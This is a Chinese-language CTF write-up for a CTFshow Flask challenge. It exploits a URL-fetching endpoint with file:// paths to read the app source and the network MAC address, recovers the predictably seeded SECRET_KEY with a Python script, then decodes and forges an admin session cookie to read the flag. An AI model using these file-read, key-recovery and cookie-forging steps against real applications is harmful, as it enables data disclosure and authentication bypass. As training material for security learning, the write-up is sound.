CTFSHOW-Flask_Session伪造

解题思路

信息获取

访问靶机页面

点击读取网页按钮跳转到了一个页面里面,

将URL修改成,利用files伪协议构造的本地路径

file:///proc/self/cmdline

得到python程序的位置,接下来读取app.py看看有什么内容

file:///app/app.py
# encoding:utf-8
import re, random, uuid, urllib.request
from flask import Flask, session, request

app = Flask(__name__)
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*100)
print(app.config['SECRET_KEY'])
app.debug = False

@app.route('/')
def index():
    session['username'] = 'guest'
    return 'CTFshow 网页爬虫系统 <a href="/read?url=https://baidu.com">读取网页</a>'

@app.route('/read')
def read():
    try:
        url = request.args.get('url')
        if re.findall('flag', url, re.IGNORECASE):
            return '禁止访问'
        res = urllib.request.urlopen(url)
        return res.read().decode('utf-8', errors='ignore')
    except Exception as ex:
        print(str(ex))
    return '无读取内容可以展示'

@app.route('/flag')
def flag():
    if session.get('username') == 'admin':
        return open('/flag.txt', encoding='utf-8').read()
    else:
        return '访问受限'

if __name__=='__main__':
    app.run(
        debug=False,
        host="0.0.0.0"
    )

发现一个/flag路径,只有里面的用户名是admin的时候才能访问

使用提供的脚本获取加密和解密所需要的随机数

import requests
import uuid
import random
import os

url = "http://localhost:5055/"

def get_randStr():
    response = requests.get(url + "read?url=file:///sys/class/net/eth0/address")
    mac = response.text.strip()
    temp = mac.split(':')
    temp = [int(i,16) for i in temp]
    temp = [bin(i).replace('0b','').zfill(8) for i in temp]
    temp = ''.join(temp)
    mac = int(temp,2)
    random.seed(mac)
    randStr = str(random.random()*100)
    return randStr

if __name__ == '__main__':
    randStr = get_randStr()
    print("Random String:", randStr)

使用github开源的脚本 对 sessiontoken进行解码和编码

D:\Desktop\CTFTools\flask-session-cookie-manager-1.2.2>python3 flask_session_cookie_manager3.py decode -c "eyJ1c2VybmFtZSI6Imd1ZXN0In0.aarB8Q.xYHGWP61YtFQG5lkUDIEeGVxDAk" -s 25.044708187679564
{'username': 'guest'}

D:\Desktop\CTFTools\flask-session-cookie-manager-1.2.2>python3 flask_session_cookie_manager3.py encode -t "{'username': 'admin'}" -s "25.044708187679564"
eyJ1c2VybmFtZSI6ImFkbWluIn0.aarEVA.2UsSXk3ICZRfj4FzFYYFerQBuhs

最后得到flag

 


目录